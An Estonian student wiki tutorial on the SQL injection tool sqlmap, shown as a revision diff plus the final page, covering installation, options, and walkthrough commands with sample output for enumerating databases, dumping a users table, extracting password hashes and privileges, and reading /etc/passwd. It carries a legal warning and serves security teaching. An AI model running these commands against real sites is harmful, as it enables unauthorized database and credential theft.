Sqlmap: Difference between revisions

From ICO wiki
Jump to navigationJump to search
Eprudnik (talk | contribs)
No edit summary
Eprudnik (talk | contribs)
 
(6 intermediate revisions by the same user not shown)
Line 6: Line 6:
Rühm: A21
Rühm: A21


Mai 2015
14.05.2015
'''''
'''''
== Lühikirjeldus ==
== Lühikirjeldus ==
Line 12: Line 12:
SQLmap on avatud lähtekoodiga programm, mida kasutatakse SQL injektsiooni nõrkuste leidmiseks ja ärakasutamiseks, selleks et testida andmebaasiserverite turvalisust. [http://sqlmap.org/]
SQLmap on avatud lähtekoodiga programm, mida kasutatakse SQL injektsiooni nõrkuste leidmiseks ja ärakasutamiseks, selleks et testida andmebaasiserverite turvalisust. [http://sqlmap.org/]


SQLmap võimaldab näiteks: luua otseühendust andmebaasiga, alla laadida andmebaasi tabeleid, murda lihtsamaid paroole kasutades sõnastikupõhist rünnet, alla laadida või üles laadida faile andmebaasiserverist, käivitada käske andmebaasiserveris, saada teise kasutaja õigusi jne. [http://sqlmap.org/]
SQLmap võimaldab näiteks: luua otseühendust andmebaasiga, alla laadida andmebaasi tabeleid, murda lihtsamaid paroole kasutades sõnastikupõhist rünnet, alla laadida või üles laadida faile andmebaasiserverist, käivitada käske andmebaasiserveris, eskaleerida kasutaja õigusi jne. [http://sqlmap.org/]
 
Toetab mitmesuguseid andmebaasisüsteeme:  MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB ja HSQLDB. [https://github.com/sqlmapproject/sqlmap/wiki/Features]


<span style="color:red"> NB! SQLmap'i kasutamine kellegi ründamiseks ilma mõlemapoolse nõusolekuta on kuritegu! Kasutajad võtavad täieliku vastutuse enda tegude eest ning programmi loojad ei vastuta võimaliku väärkasutuse või kahju eest!</span>
<span style="color:red"> NB! SQLmap'i kasutamine kellegi ründamiseks ilma mõlemapoolse nõusolekuta on kuritegu! Kasutajad võtavad täieliku vastutuse enda tegude eest ning programmi loojad ei vastuta võimaliku väärkasutuse või kahju eest!</span>
Line 19: Line 21:
==Paigaldamine==
==Paigaldamine==
'''
'''
SQLmap on operatsioonisüsteemist sõltumatu, kuna on kirjutatud keeles Python. Teda on võimalik kasutada nii Windowsis kui ka Linux/Unix all. [https://github.com/sqlmapproject/sqlmap/wiki/Dependencies]
'''
====Linux/Unix====
'''
SQLmap'i jaoks on kõigepealt vaja paigaldada Python 2.6 või 2.7 versioon.
1. Paigalda Python (Debian, Ubuntu).
<pre>sudo apt-get install python2.6</pre>
2. Kontrolli versiooni.
<pre>python --version</pre>
3. Seejärel alla laadida SQLmap.
<pre>wget from http://sqlmap.sourceforge.net/#download</pre>
4. Pakkida see lahti ja käivitada.
<pre>tar zxvf sqlmap-0.9.tar.gz
cd sqlmap
python sqlmap.py</pre>
5. Edukal paigaldamisel tagastab SQLmap:
<pre>sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
Usage: python sqlmap.py [options]
sqlmap.py: error: missing a mandatory parameter ('-d', '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), -h for help</pre>
[https://hackertarget.com/sqlmap-tutorial/ Abi paigaldamisel Linux/Unix all]
'''
====Windows====
'''
1. Alla laadida ja paigaldada Python 2.6 või 2.7 kodulehelt: [https://www.python.org/ Python]
2. Alla laadida zip fail SQLmap'i kodulehelt, pakkida see lahti. [https://sqlmap.org SQLmap] Käsurealt liikuda kataloogi, kuhu see lahti pakiti ja käivitada.
<pre>C:\sqlmapproject-sqlmap-2defc30>python ./sqlmap.py
Usage: ./sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wiza
rd, --update, --purge-output or --dependencies), use -h for basic or -hh for adv
anced help
Press Enter to continue...</pre>
[http://www.binarytides.com/install-run-sqlmap-windows/ Abiks Windowsis paigaldamisel]
'''
==Süntaks==
'''
Ülevaade SQLmap'i [https://github.com/sqlmapproject/sqlmap/wiki/Usage süntaksist]. Käsu üldkuju:
<pre>python sqlmap.py [options]</pre>
Mõned võtmed:
1. '''Sihtmärk''', kellega ühendutakse:
<pre>
-d DIRECT          Otseühendus andmebaasiga
-u URL, --url=URL  Sihtmärgi URL (näiteks "www.target.com/vuln.php?id=1")</pre>
2. '''Päring''', kuidas sihtmärgiga ühendutakse:
<pre>
--data=DATA        Andmestring saadetakse läbi POST'i
--host=HOST        HTTP Host'i päis
--proxy=PROXY      Kasutada HTTP proxy't et ühenduda URL'iga
--delay=DELAY      Ooteaeg sekundites HTTP päringute vahel
--force-ssl        Kasuta SSL/HTTPS'i
</pre>
3. '''Optimiseerimine''':
<pre>--threads=THREADS  Samaaegsete HTTP(s) päringute arv (vaikimisi 1)</pre>
4. '''Andmebaas''':
<pre>
-a, --all          Tagasta kõik
--current-user      Tagasta hetkel kasutuses oleva kasutaja
--users            Loetle kasutajad
--passwords        Loetle kasutajate parooliräsid
--privileges        Loetle kasutajate privileegid
--roles            Loetle kasutajate rollid
--dbs              Loetle andmebaasid
--tables            Loetle andmebaasi tabelid
--columns          Loetle andmebaasi tabeli veerud
--schema            Loetle andmebaasi skeem
--dump              Väljasta kogu andmebaasi sisu
--dump-all          Väljasta kõikide andmebaaside sisu
--search            Otsi veergu, tabelit ja/või andmebaasi nime
-D DB              Mis andmebaasist loetleda
-T TBL              Mis andmebaasi tabelist loetleda
-C COL              Mis tabeli veerust loetleda
-U USER            Mis kasutaja kohta loetleda
</pre>
5. '''Failid''':
<pre>
--file-read=RFILE  Loe fail süsteemist
--file-write=WFILE  Kirjuta fail süsteemi
--file-dest=DFILE  Absoluutne failitee kuhu kirjutada
</pre>
Lisaks on SQLmap'il veel väga palju muid võtmeid.
'''
==Kasutamine==
'''
Kuidas kontrollida, kas veebisait on nõrk SQL injektsiooni suhtes?[http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/]
Olgu lehe aadress:
<pre>http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15</pre>
Lisame URL'i lõpu märgi '. Nüüd on lehe URL:
<pre>http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'</pre>
Kui leht tagastab SQL veateate, on see leht nõrk SQL injektsiooni suhtes.
'''
====Andmebaasid ja tabelid====
'''
1. Oletame, et tahame SQLmap'iga testida nõrka veebilehte. Veebilehega '''ühendumiseks''' kasutame võtit '''-u''' (URL).[http://www.binarytides.com/sqlmap-hacking-tutorial/]
<pre>python sqlmap.py -u "http://www.site.com/section.php?id=51"</pre>
Näidisväljund, milles näha opsüsteem, veebiserveri ja andmebaasi tüüp koos versiooninumbriga:[http://www.binarytides.com/sqlmap-hacking-tutorial/]
<pre>[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5</pre>
2. Kuna antud veebiserver on seega rünnatav, saab näiteks tagastada '''andmebaaside nimekirja''', kasutades võtit '''--dbs''':[http://www.binarytides.com/sqlmap-hacking-tutorial/]
<pre>python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs</pre>
Näidisväljund, mis näitab andmebaaside nimekirja:[http://www.binarytides.com/sqlmap-hacking-tutorial/]
<pre>[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics</pre>
3. Leiame '''kõik tabelid''', mis asuvad andmebaasis "safecosmetics":[http://www.binarytides.com/sqlmap-hacking-tutorial/]
<pre>python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics</pre>
Näidisväljund:[http://www.binarytides.com/sqlmap-hacking-tutorial/]
<pre>[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections                                                                               
........... more tables</pre>
4. Leiame '''veerud tabelis''' "users" andmebaasis "safecosmetics":[http://www.binarytides.com/sqlmap-hacking-tutorial/]
<pre>python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users</pre>
Näidisväljund:[http://www.binarytides.com/sqlmap-hacking-tutorial/]
<pre>[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                       
[12:17:45] [INFO] retrieved: name                                                                                           
[12:17:46] [INFO] retrieved: text                                                                                           
[12:17:47] [INFO] retrieved: password                                                                                       
[12:17:48] [INFO] retrieved: text                                                                                           
.......
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type        |
+-------------------+--------------+
| email            | text        |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text        |
| password          | text        |
| permission        | tinyint(4)  |
| system_allow_only | text        |
| system_home      | text        |
+-------------------+--------------+</pre>
5. Leiame eelnevast '''tabelist andmed''':[http://www.binarytides.com/sqlmap-hacking-tutorial/]
<pre>python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users</pre>
Näidisväljund, mis on sarnane mysqldump käsule:[http://www.binarytides.com/sqlmap-hacking-tutorial/]
<pre>+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash              | name      | email    | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin    | <blank>  | <blank>  | 3          | <blank>    | <blank>          |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+</pre>
'''
====Kasutajad====
'''
1. Järgnev käsk tagastab infot '''kasutajate ja rollide''' kohta.[http://www.binarytides.com/hack-remote-database-sqlmap/]
<pre>python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10</pre>
Näidisväljund:[http://www.binarytides.com/hack-remote-database-sqlmap/]
<pre>..........
database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'
.............
database management system users password hashes:
[*]  [1]:
    password hash: NULL
[*] root [2]:
    password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
    password hash: NULL
........
[*] %root% (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE</pre>
2. Leiame info hetkel kasutusel oleva '''kasutaja, andmebaasi ja hostinime''' kohta:[http://www.binarytides.com/hack-remote-database-sqlmap/]
<pre>python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10</pre>
Näidisväljund:[http://www.binarytides.com/hack-remote-database-sqlmap/]
<pre>........
[11:32:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[11:32:33] [INFO] fetching current user
[11:32:33] [INFO] retrieving the length of query output
[11:32:33] [INFO] retrieved: 14
[11:32:38] [INFO] retrieved: root@localhost           
current user:    'root@localhost'
[11:32:38] [INFO] fetching current database
[11:32:38] [INFO] retrieving the length of query output
[11:32:38] [INFO] retrieved: 5
[11:32:40] [INFO] resumed: profile_data
current database:    'profile_data'
[11:32:40] [INFO] fetching server hostname
[11:32:40] [INFO] retrieving the length of query output
[11:32:40] [INFO] retrieved: 21
[11:32:48] [INFO] retrieved: localhost.localdomain           
hostname:    'localhost.localdomain'
[11:32:48] [INFO] testing if current user is DBA
[11:32:48] [INFO] fetching current user
current user is DBA:    False</pre>
3. Leiame kasutaja '''parooliräsi''':[http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/]
<pre>sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump</pre>
Näidisväljund:[http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/]
<pre>[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+</pre>
'''
====Failid====
'''
1. '''Faili lugemine''' kui on olemas vajalikud õigused, näiteks /etc/passwd:[http://www.binarytides.com/hack-remote-database-sqlmap/]
<pre>python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10</pre>
'''
==Kokkuvõte==
'''
SQLmap on väärtuslik töörist, selleks et mugavalt testida oma süsteemi SQL injektsioonide suhtes ja leida üles olemasolevad nõrkused. Teda on võimalik seadistada vastavalt enda vajadustele ja toetab paljusid andmebaasisüsteeme. Lisaks on ta kasutatav nii Windowsi kui Linux/Unix all.


'''
'''
====1. Linux/Unix====
==Kasutatud kirjandus==
'''
'''
[http://www.binarytides.com/sqlmap-hacking-tutorial/ Binarytides]
[http://www.binarytides.com/hack-remote-database-sqlmap/ Binarytides]
[https://hackertarget.com/sqlmap-tutorial/ Hackertarget]
[https://github.com/sqlmapproject/sqlmap/wiki/Usage SQLmap Usage]
[https://github.com/sqlmapproject/sqlmap/wiki/Features SQLmap Features]
[http://www.darkmoreops.com/2014/08/28/use-sqlmap-sql-injection-hack-website-database/ Darkmoreops]

Latest revision as of 17:14, 14 May 2015

SQLmap

Autor: Elina Prudnikova

Rühm: A21

14.05.2015

Lühikirjeldus

SQLmap on avatud lähtekoodiga programm, mida kasutatakse SQL injektsiooni nõrkuste leidmiseks ja ärakasutamiseks, selleks et testida andmebaasiserverite turvalisust. [1]

SQLmap võimaldab näiteks: luua otseühendust andmebaasiga, alla laadida andmebaasi tabeleid, murda lihtsamaid paroole kasutades sõnastikupõhist rünnet, alla laadida või üles laadida faile andmebaasiserverist, käivitada käske andmebaasiserveris, eskaleerida kasutaja õigusi jne. [2]

Toetab mitmesuguseid andmebaasisüsteeme: MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB ja HSQLDB. [3]

NB! SQLmap'i kasutamine kellegi ründamiseks ilma mõlemapoolse nõusolekuta on kuritegu! Kasutajad võtavad täieliku vastutuse enda tegude eest ning programmi loojad ei vastuta võimaliku väärkasutuse või kahju eest!

Paigaldamine

SQLmap on operatsioonisüsteemist sõltumatu, kuna on kirjutatud keeles Python. Teda on võimalik kasutada nii Windowsis kui ka Linux/Unix all. [4]

Linux/Unix

SQLmap'i jaoks on kõigepealt vaja paigaldada Python 2.6 või 2.7 versioon.

1. Paigalda Python (Debian, Ubuntu).

sudo apt-get install python2.6

2. Kontrolli versiooni.

python --version

3. Seejärel alla laadida SQLmap.

wget from http://sqlmap.sourceforge.net/#download

4. Pakkida see lahti ja käivitada.

tar zxvf sqlmap-0.9.tar.gz

cd sqlmap

python sqlmap.py

5. Edukal paigaldamisel tagastab SQLmap:

sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

Usage: python sqlmap.py [options]

sqlmap.py: error: missing a mandatory parameter ('-d', '-u', '-l', '-r', '-g', '-c', '--wizard' or '--update'), -h for help

Abi paigaldamisel Linux/Unix all

Windows

1. Alla laadida ja paigaldada Python 2.6 või 2.7 kodulehelt: Python

2. Alla laadida zip fail SQLmap'i kodulehelt, pakkida see lahti. SQLmap Käsurealt liikuda kataloogi, kuhu see lahti pakiti ja käivitada.

C:\sqlmapproject-sqlmap-2defc30>python ./sqlmap.py
Usage: ./sqlmap.py [options]

sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wiza
rd, --update, --purge-output or --dependencies), use -h for basic or -hh for adv
anced help

Press Enter to continue...

Abiks Windowsis paigaldamisel

Süntaks

Ülevaade SQLmap'i süntaksist. Käsu üldkuju:

python sqlmap.py [options]

Mõned võtmed:

1. Sihtmärk, kellega ühendutakse:

-d DIRECT           Otseühendus andmebaasiga
-u URL, --url=URL   Sihtmärgi URL (näiteks "www.target.com/vuln.php?id=1")

2. Päring, kuidas sihtmärgiga ühendutakse:

--data=DATA         Andmestring saadetakse läbi POST'i
--host=HOST         HTTP Host'i päis
--proxy=PROXY       Kasutada HTTP proxy't et ühenduda URL'iga
--delay=DELAY       Ooteaeg sekundites HTTP päringute vahel
--force-ssl         Kasuta SSL/HTTPS'i

3. Optimiseerimine:

--threads=THREADS   Samaaegsete HTTP(s) päringute arv (vaikimisi 1)

4. Andmebaas:

-a, --all           Tagasta kõik
--current-user      Tagasta hetkel kasutuses oleva kasutaja
--users             Loetle kasutajad
--passwords         Loetle kasutajate parooliräsid
--privileges        Loetle kasutajate privileegid
--roles             Loetle kasutajate rollid
--dbs               Loetle andmebaasid
--tables            Loetle andmebaasi tabelid
--columns           Loetle andmebaasi tabeli veerud
--schema            Loetle andmebaasi skeem
--dump              Väljasta kogu andmebaasi sisu
--dump-all          Väljasta kõikide andmebaaside sisu
--search            Otsi veergu, tabelit ja/või andmebaasi nime
-D DB               Mis andmebaasist loetleda
-T TBL              Mis andmebaasi tabelist loetleda
-C COL              Mis tabeli veerust loetleda
-U USER             Mis kasutaja kohta loetleda

5. Failid:

--file-read=RFILE   Loe fail süsteemist
--file-write=WFILE  Kirjuta fail süsteemi
--file-dest=DFILE   Absoluutne failitee kuhu kirjutada

Lisaks on SQLmap'il veel väga palju muid võtmeid.

Kasutamine

Kuidas kontrollida, kas veebisait on nõrk SQL injektsiooni suhtes?[5]

Olgu lehe aadress:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15

Lisame URL'i lõpu märgi '. Nüüd on lehe URL:

http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'

Kui leht tagastab SQL veateate, on see leht nõrk SQL injektsiooni suhtes.

Andmebaasid ja tabelid

1. Oletame, et tahame SQLmap'iga testida nõrka veebilehte. Veebilehega ühendumiseks kasutame võtit -u (URL).[6]

python sqlmap.py -u "http://www.site.com/section.php?id=51"

Näidisväljund, milles näha opsüsteem, veebiserveri ja andmebaasi tüüp koos versiooninumbriga:[7]

[*] starting at 12:10:33

[12:10:33] [INFO] resuming back-end DBMS 'mysql' 
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

2. Kuna antud veebiserver on seega rünnatav, saab näiteks tagastada andmebaaside nimekirja, kasutades võtit --dbs:[8]

python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

Näidisväljund, mis näitab andmebaaside nimekirja:[9]

[*] starting at 12:12:56

[12:12:56] [INFO] resuming back-end DBMS 'mysql' 
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics

3. Leiame kõik tabelid, mis asuvad andmebaasis "safecosmetics":[10]

python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

Näidisväljund:[11]

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections                                                                                
........... more tables

4. Leiame veerud tabelis "users" andmebaasis "safecosmetics":[12]

python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

Näidisväljund:[13]

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                         
[12:17:45] [INFO] retrieved: name                                                                                            
[12:17:46] [INFO] retrieved: text                                                                                            
[12:17:47] [INFO] retrieved: password                                                                                        
[12:17:48] [INFO] retrieved: text                                                                                            

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+

5. Leiame eelnevast tabelist andmed:[14]

python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

Näidisväljund, mis on sarnane mysqldump käsule:[15]

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

Kasutajad

1. Järgnev käsk tagastab infot kasutajate ja rollide kohta.[16]

python sqlmap.py -u "http://localhost/weak.php?id=10" --users --passwords --privileges --roles --threads=10

Näidisväljund:[17]

..........

database management system users [5]:
[*] ''@'localhost'
[*] ''@'localhost.localdomain'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'root'@'localhost.localdomain'

.............

database management system users password hashes:
[*]  [1]:
    password hash: NULL
[*] root [2]:
    password hash: *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
    password hash: NULL

........

[*] %root% (administrator) [27]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

2. Leiame info hetkel kasutusel oleva kasutaja, andmebaasi ja hostinime kohta:[18]

python sqlmap.py -u "http://localhost/weak.php?id=10" --current-user --is-dba --current-db --hostname --threads=10

Näidisväljund:[19]

........
[11:32:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[11:32:33] [INFO] fetching current user
[11:32:33] [INFO] retrieving the length of query output
[11:32:33] [INFO] retrieved: 14
[11:32:38] [INFO] retrieved: root@localhost             
current user:    'root@localhost'
[11:32:38] [INFO] fetching current database
[11:32:38] [INFO] retrieving the length of query output
[11:32:38] [INFO] retrieved: 5
[11:32:40] [INFO] resumed: profile_data
current database:    'profile_data'
[11:32:40] [INFO] fetching server hostname
[11:32:40] [INFO] retrieving the length of query output
[11:32:40] [INFO] retrieved: 21
[11:32:48] [INFO] retrieved: localhost.localdomain             
hostname:    'localhost.localdomain'
[11:32:48] [INFO] testing if current user is DBA
[11:32:48] [INFO] fetching current user
current user is DBA:    False

3. Leiame kasutaja parooliräsi:[20]

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

Näidisväljund:[21]

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

Failid

1. Faili lugemine kui on olemas vajalikud õigused, näiteks /etc/passwd:[22]

python sqlmap.py -u "http://localhost/weak.php?id=10" --file-read=/etc/passwd --threads=10

Kokkuvõte

SQLmap on väärtuslik töörist, selleks et mugavalt testida oma süsteemi SQL injektsioonide suhtes ja leida üles olemasolevad nõrkused. Teda on võimalik seadistada vastavalt enda vajadustele ja toetab paljusid andmebaasisüsteeme. Lisaks on ta kasutatav nii Windowsi kui Linux/Unix all.

Kasutatud kirjandus

Binarytides

Binarytides

Hackertarget

SQLmap Usage

SQLmap Features

Darkmoreops